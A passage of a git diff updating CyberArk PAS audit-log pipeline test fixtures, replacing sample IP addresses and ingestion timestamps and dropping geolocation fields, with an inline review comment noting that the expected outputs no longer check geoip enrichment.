@@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection start", - "ingested": "2021-06-09T10:24:33.411730200Z", + "ingested": "2021-12-09T13:36:57.093060600Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e326\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection Start\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection Start\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection Start\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"326\",\"Desc\":\"CPM Auto-detection Start\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection Start\",\"GatewayStation\":\"\"}}}", "code": "326", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json index 79e6f6e7ef6..89ba47c48c9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json 
@@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection end", - "ingested": "2021-06-09T10:24:33.441721800Z", + "ingested": "2021-12-09T13:36:57.215852200Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e327\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection End\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection End\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection End\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"327\",\"Desc\":\"CPM Auto-detection End\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection End\",\"GatewayStation\":\"\"}}}", "code": "327", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log index 16ec40c4f3c..99bf81c1f96 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log 
@@ -1,7 +1,7 @@ -<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 
11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update 
Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-11T17:38:14Z 
VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json index 29a65f0335f..62613abab1e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -41,7 +29,7 @@ "PVWAAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
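Review bot: The rewritten `source` object drops the whole `source.geo` block rather than replacing it with the geolocation for the new address, so this expected file no longer asserts that the geoip enrichment runs at all. If 67.43.156.0/24 was picked because it is one of the networks present in the test GeoIP database (which is what the switch away from the old third-party addresses suggests), an expected output with no `source.geo` more likely reflects a regeneration against a stack without that database than the pipeline's real behaviour, and the same loss repeats in the later `source` hunks of this file (old offsets -92, -177, -262, -347, -432 and -516). It would be worth regenerating against the intended database, or, if the geo fields are deliberately left unchecked, recording that decision in the test config rather than silently. The rest of the hunk is consistent: `source.ip`, `related.ip` and `station` all carry the new address, and the `.log` input still keeps the sixth record on a distinct address (67.43.156.14) so the per-record address mapping is preserved.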
@@ -50,7 +38,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:49Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PVWAAppUsers", "message": "Update Owner", @@ -64,8 +52,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474073800Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:49\",\"IsoTimestamp\":\"2021-03-10T18:16:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329023500Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:49\",\"IsoTimestamp\":\"2021-03-10T18:16:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", 
@@ -92,20 +80,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -126,7 +102,7 @@ "PSMApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -135,7 +111,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:50Z", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PSMApp_VAGRANT", "message": "Update Owner", 
@@ -149,8 +125,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474089200Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:50\",\"IsoTimestamp\":\"2021-03-10T18:16:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329031900Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:50\",\"IsoTimestamp\":\"2021-03-10T18:16:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", 
@@ -177,20 +153,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -211,7 +175,7 @@ "PSMAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -220,7 +184,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:51Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PSMAppUsers", "message": "Update Owner", 
@@ -234,8 +198,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474092400Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329037500Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", 
@@ -262,20 +226,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -296,7 +248,7 @@ "PSMMaster" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -305,7 +257,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:51Z", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "PSMMaster", "message": "Update Owner", 
@@ -319,8 +271,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.474095100Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:57.329042900Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", "action": "update owner", 
@@ -347,20 +299,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -381,7 +321,7 @@ "Vault Admins" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -390,7 +330,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:53Z", "safe": "PSMUniversalConnectors", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update Owner", "source_user": "Vault Admins", "message": "Update Owner", 
